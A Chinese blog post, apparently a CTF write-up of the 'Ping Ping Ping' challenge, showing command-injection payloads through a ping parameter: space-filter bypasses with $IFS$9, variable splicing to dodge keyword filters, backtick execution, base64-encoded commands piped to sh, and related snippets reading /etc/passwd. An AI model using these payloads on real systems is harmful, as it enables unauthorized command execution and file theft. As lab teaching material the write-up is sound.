Ping Ping Ping

已于 2022-05-17 19:59:20 修改
阅读量186 收藏
点赞数
分类专栏: 笔记 文章标签: 服务器 网络 运维
于 2022-05-17 19:55:15 首次发布
原文链接:https://www.freebuf.com/articles/web/273656.html
版权
本文详细介绍了在Web安全中遇到的命令执行问题,包括如何通过`ping`测试连接,使用`ls`、`cat`等命令查看文件内容,以及在遇到空格过滤时的绕过策略,如使用`$IFS$9`。此外,还分享了两种不同的解题方法,分别是内联执行和利用未过滤的`sh`。这些技巧对于理解Linux命令执行和安全测试具有实用价值。
摘要由CSDN通过智能技术生成

做web题也经常遇到很多关于命令执行的一些姿势,这次就总结下来:

https://www.codenong.com/cs105422347/

进入题目

肯定先Ping一下本地IP:127.0.0.1

能连接上

然后用**ls**关键字列出当前目录的内容

接着我们肯定想查看flag.php里面的值
用**cat**命令查看文件内容,
还有其他查看命令主要是tac,head,more,tail,less
显示空格被过滤了;
一般空格过滤绕过的方法:

{cat,flag};   ${IFS$;   $IFS$9;   <;   <>;

经过测试用空格用**$IFS$9**绕过;
然后变量**拼接,倒序**得到payload:

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$1$b$a.php
也可以?ip=127.0.0.1;a=lag;cat$IFS$9f$a.php

解法2:

内联执行绕过
将**反引号内**命令的输出作为输入执行

?ip=|cat$IFS$9`ls`

解法3:

虽然过滤了bash,但没过滤sh,可以使用下面的方法:

ip=1;echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

crabin_lpb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf [GXYCTF2019]Ping Ping Ping!
hintll的博客
06-10 1007
[GXYCTF2019]Ping Ping Ping! 这个题目的标题是ping ping ping 打开以后是这样的 先是看到这个提示,看到?第一想到的就是get,那么就先get一个ip上去 然后有一行回显 应该是命令执行漏洞 命令执行就用命令拼接符执行漏洞命令就行 命令拼接符: |、||、&、&&的区别: &:无论左边是false还是true,右边都执行 &&:具有短路效果,左边是false,右边不执行。 |:无论左边是false还是true,右边都会执
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1804
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
[HDU 6203] ping ping ping
zhysora的博客
09-11 286
题目链接: http://acm.hdu.edu.cn/showproblem.php?pid=6203题意:给出一棵树, 给出p组点对(u, v), 求删除最少的点使得这p组点对均不联通。(n≤104,p≤2∗104n \leq 10^4, p \leq 2*10^4)思路:处理出每组点对的lca,按lca的深度从大到小依次考虑, 如果u, v均没有被标记, 则标记lca子树内的所有点, 答案+1
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7932
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
[GXYCTF2019]Ping Ping Ping(RCE)
xlcvv的博客
04-06 7531
这题考的比较全面: 随便ping一下: 正常request了,那跟我之前做的有一题应该差不多,直接payload: ?ip=127.0.0.1;cat%20/flag 应该是过滤了一些符号,那先试试payload: ?ip=127.0.0.1;ls 还好ls了一下,不然这不得cat半天? 试一下cat index: 过滤空格了,可以用${IFS}$代替: 可能也过滤了{},用$IF...
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
PINGtest_ping_
09-28
标题"PINGtest_ping_"指的是一个用于测试网络连通性的工具,特别关注于使用"ping"命令来检查IP地址的可达性。"ping"是互联网控制报文协议(ICMP)的一部分,它允许网络设备发送“回显请求”到目标IP地址,然后接收...
易语言本地ping例子
09-06
使用此;例子可以本地ping指定网址,查看网址参数
ping工具.zip
03-19
"长ping工具.zip"是一个压缩包,其中包含了一个专门用于执行长时间ping操作的工具。这个工具不仅能够持续ping指定的IP地址,而且还能详细记录每次ping请求的响应时间和结果,这对于网络故障排查、网络延迟分析以及...
Linux批量pingIP地址
最新发布
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
ping ping ping HDU - 6203
sunyutian1998的博客
08-28 196
http://acm.hdu.edu.cn/showproblem.php?pid=6203 给出q条链 由u和v确定 每条链上至少有一个节点是有故障的 问整个树图中至少有多少故障节点 对于每条链 求出lca 再按lca的深度降序排序 然后对于一条链 如果uv节点都没有被其他链覆盖过 那就将lca对应的整棵子树标记覆盖 答案加加 否则就说明当前这条链上的故障点已经可以和别的链合并了 可以忽略...
Web命令执行
qq_53086690的博客
06-16 385
利用通配符来执行命令 c=/?in/cat+/et?/passw? 可以当做/bin/cat/etc/passwd ?可以匹配任意字符 过滤空格的方法 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{,} {cat,/etc/passwd} $IFS 空格绕过 cat$IFS$1a.txt 变量控制 X=$'cat\x09./flag.php 关键词过滤 使用空变量 使用$*和$@,$x(x 代表 1
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6846
BUUCTFWP,关于一些waf的绕过
PINGPINGPING!连接世界!
Jackchunyang的博客
03-24 351
突发奇想,想看看安卓上能不能实现ping命令,一百度,已经有现成的程序了,但是没有代码。没代码就自己写咯,想想还是挺激动的呢。          废话不多说,上图: 界面文件代码 &lt;LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schem...
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
热门推荐
algae
08-29 1万+
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5394
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
ctf xor题_CTF下的命令执行
weixin_39877898的博客
12-29 2529
前言:做web题也经常遇到很多关于命令执行的一些姿势,这次就总结下来。0x00:一些绕过姿势在遇到的一些web题中,会经常将以下几种给过滤或者进行限制:空格命令分隔符关键字限制长度限制回显等等,这次就通过题目将这些如何绕过的知识给记录下来。空格绕过常见的绕过符号有:$IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、#$IFS在linux下表示分隔符,如果...
CTF命令执行与绕过
Rog's Blog
04-12 1436
浅谈CTF中命令执行与绕过的小技巧 一、空格绕过 1.cat<filename shell 2.cat<>filename shell 3.{cat,filename} shell 4.%09 符号 php 5.cat$IFS$9filename cat${IFS}filename shell 二、命令分隔符号 1.ls /;cat filename shell 2.ls /&cat filename shell 3.ls /|cat filename shell 4.%0a p
命令执行bypass小笔记
kwist_jay的博客
07-01 274
主要内容于常见命令执行的一些绕过方式中提及 补充: 1、在base64转换绕过flag的过滤时,bash也被绕过,此时可以使用sh、ash来达到相同目的 比如 :echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh 2、在用变量替换字母时,不能做二意性替换,比如flag.php,也就是说只能用变量替换g,如果做如下替换,c=a;cat fl$cg.php被执行时,系统会识别变量为$cg,而不是我们主观上的$c,这一点需要注意。 3、绕过黑名单可以用$1、$2和$
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat$IFS$9`ls`。这样可以获取到flag.php和index.php这两个文件名。然而,关于如何绕过flag的过滤,引用[1]中并没有提到具体的方法。因此,需要进一步的信息才能回答这个问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值